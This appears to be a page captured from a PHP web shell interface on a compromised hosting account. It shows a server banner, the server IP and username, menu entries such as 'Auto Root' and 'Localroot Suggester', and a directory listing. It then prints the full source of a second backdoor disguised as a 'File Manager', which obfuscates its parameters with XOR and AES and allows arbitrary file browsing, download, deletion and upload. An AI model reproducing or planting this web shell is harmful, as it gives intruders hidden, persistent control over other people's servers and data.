Linux premium242.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
LiteSpeed
Server IP : 66.29.146.154 & Your IP : 216.73.216.6
Domains :
Cant Read [ /etc/named.conf ]
User : tukiwyzk
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
tukiwyzk /
lvacbd.xyz /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
197
B
-r--r--r--
2025-10-17 07:59
1.php
4.32
KB
-rw-r--r--
2025-08-10 22:52
cookie.txt
131
B
-rw-r--r--
2025-12-09 00:15
index.php
1.39
KB
-rw-r--r--
2025-05-18 12:22
Save
Rename
<?php ini_set('display_errors', 1); ini_set('display_startup_errors', 1); error_reporting(E_ALL); // الجلسة session_name('s3ss10n'); session_start(); // توليد مفتاح ديناميكي $secret = 'your-secret-key-123'; $salt = $_SESSION['s4lt'] ?? bin2hex(random_bytes(16)); $_SESSION['s4lt'] = $salt; $key = hash('sha256', $secret . $salt); // XOR function xor_encode($data, $key) { $out = ''; for ($i = 0; $i < strlen($data); $i++) { $out .= chr(ord($data[$i]) ^ ord($key[$i % strlen($key)])); } return base64_encode($out); } function xor_decode($data, $key) { $data = base64_decode($data, true); if ($data === false) return false; $out = ''; for ($i = 0; $i < strlen($data); $i++) { $out .= chr(ord($data[$i]) ^ ord($key[$i % strlen($key)])); } return $out; } // تشفير AES + XOR function enc3($text, $key) { if (!is_string($text) || empty($text)) return false; $iv = openssl_random_pseudo_bytes(openssl_cipher_iv_length('aes-256-cbc')); $encrypted = openssl_encrypt(xor_encode($text, $key), 'aes-256-cbc', $key, 0, $iv); if ($encrypted === false) return false; return base64_encode($encrypted . '::' . base64_encode($iv)); } function dec3($data, $key) { $data = base64_decode($data, true); if ($data === false) return false; $parts = explode('::', $data); if (count($parts) !== 2) return false; $iv = base64_decode($parts[1], true); $decrypted = openssl_decrypt($parts[0], 'aes-256-cbc', $key, 0, $iv); return xor_decode($decrypted, $key); } // حماية الرابط بتوقيع function sign_link($params, $key) { ksort($params); $query = http_build_query($params); $hmac = hash_hmac('sha256', $query, $key); $params['h'] = $hmac; return '?' . http_build_query($params); } function verify_link($params, $key) { if (!isset($params['h'])) return false; $hmac = $params['h']; unset($params['h']); ksort($params); $query = http_build_query($params); return hash_equals($hmac, hash_hmac('sha256', $query, $key)); } // المسار الحالي $base = isset($_GET['x']) ? dec3($_GET['x'], $key) : getcwd(); if ($base === false || !file_exists($base)) { echo "<h1>❌ Invalid Path</h1>"; exit; } $base = realpath($base); // حذف ملف أو مجلد if (isset($_GET['r'])) { $del = dec3($_GET['r'], $key); if ($del && file_exists($del)) { is_dir($del) ? rmdir($del) : unlink($del); header("Location: " . sign_link(['x' => enc3(dirname($del), $key)], $key)); exit; } } // تحميل ملف if (isset($_GET['d'])) { $f = dec3($_GET['d'], $key); if ($f && file_exists($f)) { header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($f) . '"'); readfile($f); exit; } } // رفع ملف if (isset($_FILES['f']) && $_FILES['f']['error'] === UPLOAD_ERR_OK) { move_uploaded_file($_FILES['f']['tmp_name'], $base . '/' . basename($_FILES['f']['name'])); header("Location: " . sign_link(['x' => enc3($base, $key)], $key)); exit; } // واجهة HTML echo "<!DOCTYPE html><html><head><meta charset='UTF-8'><title>File Manager</title> <style> body { background: #111; color: #0f0; font-family: monospace; padding: 20px; } a { color: #0f0; text-decoration: none; } a:hover { text-decoration: underline; } </style></head><body>"; echo "<h1>🗂 File Manager</h1>"; echo "<p>Path: <code>" . htmlspecialchars($base) . "</code></p><ul>"; foreach (scandir($base) as $item) { if ($item === '.') continue; $path = "$base/$item"; if (is_dir($path)) { $link = sign_link(['x' => enc3($path, $key)], $key); echo "<li>[DIR] <a href='$link'>" . htmlspecialchars($item) . "</a></li>"; } else { $dl = sign_link(['d' => enc3($path, $key)], $key); $rm = sign_link(['r' => enc3($path, $key)], $key); echo "<li>" . htmlspecialchars($item) . " - <a href='$dl'>Download</a> | <a href='$rm' style='color:red'>Delete</a></li>"; } } echo "</ul>"; echo "<form method='POST' enctype='multipart/form-data'> <input type='file' name='f'><input type='submit' value='Upload'> </form>"; echo "</body></html>"; ?>